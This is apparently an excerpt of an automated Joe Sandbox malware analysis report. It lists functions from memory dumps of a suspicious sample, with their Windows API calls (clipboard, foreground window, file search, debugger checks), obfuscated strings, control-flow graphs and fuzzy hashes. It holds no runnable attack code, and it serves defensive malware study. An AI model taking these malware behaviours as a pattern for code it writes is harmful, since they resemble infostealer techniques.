                                                                        control_flow_graph 2018 440cc0-440cd5 2019 440d50 2018->2019 2020 440d61-440d6a call 43dbb0 2018->2020 2021 440d52-440d5f RtlReAllocateHeap 2018->2021 2022 440cdc-440ce3 2018->2022 2023 440d6c-440d75 call 43dc40 2018->2023 2024 440cea-440d02 2018->2024 2019->2021 2031 440d7a-440d7d 2020->2031 2025 440d77 2021->2025 2022->2019 2022->2021 2022->2023 2022->2024 2023->2025 2028 440d10-440d35 2024->2028 2025->2031 2028->2028 2032 440d37-440d43 2028->2032 2032->2019
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 00440D59
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: RD
                                                                        • API String ID: 1279760036-1416026120
                                                                        • Opcode ID: f9da6b5eb551a4eb3825273e23e17b74b074d4dcce33d7eb076d9db6a9fcfe30
                                                                        • Instruction ID: 917b482b4b1a8382910e40b870116946ac0ab3381335ac39e00a72b089b8d08d
                                                                        • Opcode Fuzzy Hash: f9da6b5eb551a4eb3825273e23e17b74b074d4dcce33d7eb076d9db6a9fcfe30
                                                                        • Instruction Fuzzy Hash: A1018E71D19212CBE314AF75EC8492BBBA5FFCA341F18487DE48057211E634AC19C3EA

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2033 440f20-440f3a 2034 440f40-440f5b 2033->2034 2034->2034 2035 440f5d-440fa7 GetForegroundWindow call 443bb0 2034->2035
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00440F76
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ForegroundWindow
                                                                        • String ID: 2123
                                                                        • API String ID: 2020703349-208623094
                                                                        • Opcode ID: b210a30273bb33dd53bdeff02939b666426f70206f57e02b163fddc4f9f8c158
                                                                        • Instruction ID: dd62e8bd2cb4611141040fdff5c29f2e00b613cfc95a5b2aa94b2229cd067ee0
                                                                        • Opcode Fuzzy Hash: b210a30273bb33dd53bdeff02939b666426f70206f57e02b163fddc4f9f8c158
                                                                        • Instruction Fuzzy Hash: CFF028795082804BF310DB29D84122677A1E782319F04893EE5D1C3391C738C9058B0B
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 004107F9
                                                                        • CoInitialize.OLE32(00000000), ref: 00410900
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 81c31d750177ce146e8527366045329e95e1cd398779ef2311c2f0a71d9e51a1
                                                                        • Instruction ID: abed82b44eab5e0305b69bf0d3f998583154d3816c8cbfe6d220a5d9129a85a7
                                                                        • Opcode Fuzzy Hash: 81c31d750177ce146e8527366045329e95e1cd398779ef2311c2f0a71d9e51a1
                                                                        • Instruction Fuzzy Hash: 3A319CF4C10B40AFD770AF3D9A0B6167EB4AB06650F504B1DF8E6966D4E330A4198BD7

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2422 40e1c0-40e1f7 2423 40e200-40e220 2422->2423 2423->2423 2424 40e222-40e25b 2423->2424 2425 40e260-40e27c 2424->2425 2425->2425 2426 40e27e-40e296 LoadLibraryExW call 43f7a0 2425->2426 2429 40e2a1-40e2e4 call 4433b0 * 3 2426->2429 2430 40e29d-40e29f 2426->2430 2431 40e2f1-40e2fb 2429->2431 2430->2431
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(611D67ED,00000000,E3E2F9E0), ref: 0040E286
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: f354ed4ba6b11e7200a9c2819eeba715480492adbba85cd9ccd0d76fe460f61b
                                                                        • Instruction ID: d211cc36a776a4650d6a25cec4ad6f3432bf0b80887fe1339dfabb32a98ff728
                                                                        • Opcode Fuzzy Hash: f354ed4ba6b11e7200a9c2819eeba715480492adbba85cd9ccd0d76fe460f61b
                                                                        • Instruction Fuzzy Hash: 86214478508380DBD314DF26ED426AF7BA1FBD6304F448C7EE18467253E739490A87AA
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043DCCD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: a0f17913f2525a0e0f8ffefbac48ff117ce078390c367a85a56a825d6d9baac1
                                                                        • Instruction ID: 9a37441ecb8038b1869d6f0b088ecbbae8f0e36ee8fdc8f39d9be2bbcf67dc69
                                                                        • Opcode Fuzzy Hash: a0f17913f2525a0e0f8ffefbac48ff117ce078390c367a85a56a825d6d9baac1
                                                                        • Instruction Fuzzy Hash: 470197BB65C3584FC7006F91EC986A6BBA4EFD1304F04403DD68046742DAFB6919C742
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: 4d478e6bdddb855f0a42b4350af7a0d5259f94e12a6cec9b326f29541d1672a7
                                                                        • Instruction ID: 3c9e977c450c4f135c35c7a6bcfc28f59b32f7b5f649b834322db586f9a604c7
                                                                        • Opcode Fuzzy Hash: 4d478e6bdddb855f0a42b4350af7a0d5259f94e12a6cec9b326f29541d1672a7
                                                                        • Instruction Fuzzy Hash: E9F074B12097029FE311DF65C5A574BBBE5BB81304F10891CE4E54B290C7B9A6498FC2
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: dd8744f0049f0022a9c290567ed1ddad564596e0051cb20ad7bad07382e971d4
                                                                        • Instruction ID: c572d4cf98657ec48b104726610bbd336e2b736b7c73d1d011650ea931ce08df
                                                                        • Opcode Fuzzy Hash: dd8744f0049f0022a9c290567ed1ddad564596e0051cb20ad7bad07382e971d4
                                                                        • Instruction Fuzzy Hash: A8F022B450D341DFE721DF29C5A871ABBE0BB85344F118A1CE4988B290D7B995498F82
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00440F76
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ForegroundWindow
                                                                        • String ID:
                                                                        • API String ID: 2020703349-0
                                                                        • Opcode ID: 13940e78a7961238caf54405e98899f048eea334418077796825dba2beec2cee
                                                                        • Instruction ID: 1d22e8fd700c48bebeffbf26d2c2cf474de0d3d9f3e244df8e013e987bfa5a4a
                                                                        • Opcode Fuzzy Hash: 13940e78a7961238caf54405e98899f048eea334418077796825dba2beec2cee
                                                                        • Instruction Fuzzy Hash: 04E08C7D6102408FE604DF25EC9142537A4F70B20A700083EE583D3362DF35E640CB0A
                                                                        APIs
                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A965
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: 677f9b71905706cf16ce5804c70032b7d76d069880a4bf33d681318f7dfbb6f8
                                                                        • Instruction ID: 08e963fcd4019adc8e60d466b8283255b1915ff9cc04a16a63baa1f472e6b219
                                                                        • Opcode Fuzzy Hash: 677f9b71905706cf16ce5804c70032b7d76d069880a4bf33d681318f7dfbb6f8
                                                                        • Instruction Fuzzy Hash: A8D09234381700ABE2318B14EC56F15B3A1BB4AF02F204458F7866F9E0CAF1BA118B08
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 0043DC24
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 523f707672c80aeae4c87f4b2abdfa20849dd833f8c33325c04bbf3597a922fb
                                                                        • Instruction ID: ca62b0fe6bc361b8fe52465035c8e03aaa158e12bb5b8da0d05e115494f84301
                                                                        • Opcode Fuzzy Hash: 523f707672c80aeae4c87f4b2abdfa20849dd833f8c33325c04bbf3597a922fb
                                                                        • Instruction Fuzzy Hash: 46B01234146110B8D03117120CC5FFFAD7CBF43F99F102014B204240C00754A001D07D
                                                                        APIs
                                                                        • std::_Facet_Register.LIBCPMT ref: 00BB535D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BB5568
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00BB57A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Facet_Lockit::_Lockit::~_Register
                                                                        • String ID: v^[I$v^[I$v^[I$v^[I$v^[I$v^[I$v^[I$w^[I$w^[I$0FJ$0FJ$0FJ$WM$WM$WM$WM
                                                                        • API String ID: 878851027-139137744
                                                                        • Opcode ID: f08bceee975cf997faea1afb0c8170025138868427c92bdf9f81817beda6ccd2
                                                                        • Instruction ID: 192f313dfa5d013ff816be086c14c440fca8ba15a451cac2d28b25c3d1cf6bc0
                                                                        • Opcode Fuzzy Hash: f08bceee975cf997faea1afb0c8170025138868427c92bdf9f81817beda6ccd2
                                                                        • Instruction Fuzzy Hash: 3AD17C36F105058FDF08CA79C8963FF7BE39BA9304F199069E805EB351C9AB8C068B51
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$CloseDataLongOpenWindow
                                                                        • String ID: I$K$L$N$V$V$X$Y$Y$]$_$q
                                                                        • API String ID: 1647500905-2073889574
                                                                        • Opcode ID: 3d708e7702e4bf70994ea5c2850c4c62ff3c90e47989a721377a01ee830012d2
                                                                        • Instruction ID: 5f54679d46b1477f2188d147cccf107156d33419d86dcd770f9b8ea5c9be5ebf
                                                                        • Opcode Fuzzy Hash: 3d708e7702e4bf70994ea5c2850c4c62ff3c90e47989a721377a01ee830012d2
                                                                        • Instruction Fuzzy Hash: 59419F7150C781CFE300AF78D48836FBFD0AB96358F04486EE9C986382D6BD8548876B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
                                                                        • API String ID: 0-3131871939
                                                                        • Opcode ID: 8d5e88b3c21fcc771f24b2529e4533188e40b42acd8efb67ea5d129d5fbbf216
                                                                        • Instruction ID: 82a1047e918a4e78821797639cc0c6063c4209a2a2cc243c20951bfdc3e4a492
                                                                        • Opcode Fuzzy Hash: 8d5e88b3c21fcc771f24b2529e4533188e40b42acd8efb67ea5d129d5fbbf216
                                                                        • Instruction Fuzzy Hash: 0DE2D2716083418FC718CF28C49436BBBE2AF95314F18867EE495AB3D1D778D949CB8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                        • API String ID: 0-3385986306
                                                                        • Opcode ID: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
                                                                        • Instruction ID: 43567f08c2414d3a819ad9695f197ad83829e26c61288a5e6a0b7cb6c91f239b
                                                                        • Opcode Fuzzy Hash: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
                                                                        • Instruction Fuzzy Hash: 8282D5756093418FC719CF28C69431ABBE1AB85304F18896EE8D5A73D1D3B8DD05CB8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 3L,S$;:54$D4'2$gw$t|
                                                                        • API String ID: 0-148604455
                                                                        • Opcode ID: b6a5bcbc9e7952400bc449c7c29792027bb1d80a963eeb7271538c153ee93d5e
                                                                        • Instruction ID: 33cda5058ecfcda83a8ae49a4051d765de37c74bc4d0c890624df7c0bc77531d
                                                                        • Opcode Fuzzy Hash: b6a5bcbc9e7952400bc449c7c29792027bb1d80a963eeb7271538c153ee93d5e
                                                                        • Instruction Fuzzy Hash: 99F122B66083508FD3249F25D88166BBBE1FFC6315F448A2DE5C59B391D7788901CB86
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00BD4A5C,00000002,00000000,?,?,?,00BD4A5C,?,00000000), ref: 00BD5124
                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00BD4A5C,00000002,00000000,?,?,?,00BD4A5C,?,00000000), ref: 00BD514D
                                                                        • GetACP.KERNEL32(?,?,00BD4A5C,?,00000000), ref: 00BD5162
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        • Opcode ID: f7243777a27f5be818cc7d63d64433997444016a51d32ac06cccdb9f260b2d49
                                                                        • Instruction ID: 4db96298798f0524e0f7c4cad78e7b1bd9d709169443a452820f34dc0629f43e
                                                                        • Opcode Fuzzy Hash: f7243777a27f5be818cc7d63d64433997444016a51d32ac06cccdb9f260b2d49
                                                                        • Instruction Fuzzy Hash: DA218372700901AAEB348F14CD42B97F6E6EF64B54B5684E6E90AE7310FB32DD41C790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GB$){zy$)6$)B$|~$sq
                                                                        • API String ID: 0-1292531311
                                                                        • Opcode ID: 4e9632e30ef22d1c9d691365c99381acfbe6c67ba9f7670632b71d0e3dce93d0
                                                                        • Instruction ID: 71584c7dd643340a7c9b4b8dcbaefec527e76613856c743693e70a6483ef5efc
                                                                        • Opcode Fuzzy Hash: 4e9632e30ef22d1c9d691365c99381acfbe6c67ba9f7670632b71d0e3dce93d0
                                                                        • Instruction Fuzzy Hash: E1C123B16083208BD724DF25E85276BB7F1EFD2354F588A1DE4D58B390EB389805CB96
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00BD4A2E
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00BD4A6C
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00BD4A7F
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00BD4AC7
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00BD4AE2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                        • String ID:
                                                                        • API String ID: 415426439-0
                                                                        • Opcode ID: 1f88c47bd9bec80e66eb3e50bf54812b3c63bce88b4afa942f88de7f0911cf92
                                                                        • Instruction ID: aad8c6a5c21427488f762a4e0b6ea3725cc816ecef34e7247ea368347b41fc4f
                                                                        • Opcode Fuzzy Hash: 1f88c47bd9bec80e66eb3e50bf54812b3c63bce88b4afa942f88de7f0911cf92
                                                                        • Instruction Fuzzy Hash: D4514C71A00205AFDB10DFA5DC85BAEB7F8EF19701F1545AAE910EB290FB70DA00CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd75ffd76165e19137e0b0c20db2cd9f8180ca2029d34b93e14d1d1f846bb4c4
                                                                        • Instruction ID: 6c83d2f1f0f669b318d62b0f49a6bcd7551615a987fd61a833cacaa79236ec6b
                                                                        • Opcode Fuzzy Hash: cd75ffd76165e19137e0b0c20db2cd9f8180ca2029d34b93e14d1d1f846bb4c4
                                                                        • Instruction Fuzzy Hash: 1E022A71E012199BDB14CFA9D880BAEBBF1FF58314F2482ADE519E7341D731AD418B94
                                                                        APIs
                                                                        • FindWindowExW.USER32(00000000,?,A3D19DEA,00000000), ref: 0041E410
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FindWindow
                                                                        • String ID:
                                                                        • API String ID: 134000473-0
                                                                        • Opcode ID: 611df0e037769dfec0ccbd250f884b13fa727b7773da6a687875ef7a21337769
                                                                        • Instruction ID: 8cc40bb880943b3fdd4a09bf692fc47349ab873484ee8d2c9c2d8e6455f3c944
                                                                        • Opcode Fuzzy Hash: 611df0e037769dfec0ccbd250f884b13fa727b7773da6a687875ef7a21337769
                                                                        • Instruction Fuzzy Hash: 21D1E2796083518FC725CF29D84069FBBE2EFC9308F08896EE4859B391DB74D945CB86
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD575D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: b12be93f9f424d2e569b7f0b39510d14b1f4d237ad434c9a17b57cf624461fb9
                                                                        • Instruction ID: e86998303687db4e05a817bb81d4f7d934857b308c8959ddd83f731f7cc148c6
                                                                        • Opcode Fuzzy Hash: b12be93f9f424d2e569b7f0b39510d14b1f4d237ad434c9a17b57cf624461fb9
                                                                        • Instruction Fuzzy Hash: 5571E171905559AFDB30AF28CC89ABAFBF9EB05300F5441EAE049A7311EA319E859F14
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BC0D4A
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00BC0E16
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BC0E36
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00BC0E40
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 8830399152149582576a4d3f17d13e89694bdd86523170f88eccb95077b790a2
                                                                        • Instruction ID: e22144329eff78acda71640d853957dc93f00c1f07c3e97a47c230836837f337
                                                                        • Opcode Fuzzy Hash: 8830399152149582576a4d3f17d13e89694bdd86523170f88eccb95077b790a2
                                                                        • Instruction Fuzzy Hash: 3F31E575D55218DBDB20EFA4D989BCDBBF8AF18300F1041EAE409AB250EB719A858F45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "5D$@3D$G3D
                                                                        • API String ID: 0-1898335559
                                                                        • Opcode ID: a598e15b9f950c49bbc2326d93c3944d1d2eb3f819a396320624b7d3d119b0a3
                                                                        • Instruction ID: 0d27d5ca0624dddcec474f96472bfb5c1ea38ed4ad0558f269f9c7dbbb12b3c7
                                                                        • Opcode Fuzzy Hash: a598e15b9f950c49bbc2326d93c3944d1d2eb3f819a396320624b7d3d119b0a3
                                                                        • Instruction Fuzzy Hash: BF12FF39A05211CFDB18CF68D8906AEB7F2FB8A315F19847DC946A7352D335AD06CB84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "5D$@3D$G3D
                                                                        • API String ID: 0-1898335559
                                                                        • Opcode ID: 17224c73dc5f5cce02b72de51cf9a04c92f2e2c01acddb2e884a7e03e58e1cd1
                                                                        • Instruction ID: f5333144ef70c2a173cc619d7536ed6f405604b094df42d2374a6f5ff99be012
                                                                        • Opcode Fuzzy Hash: 17224c73dc5f5cce02b72de51cf9a04c92f2e2c01acddb2e884a7e03e58e1cd1
                                                                        • Instruction Fuzzy Hash: 2C020F39A05211CFDB18CF68D8906AEB7F2FB8A315F19847DD846A7342D335AD06CB94
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192285871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %!-0$:g;1$j
                                                                        • API String ID: 0-565037024
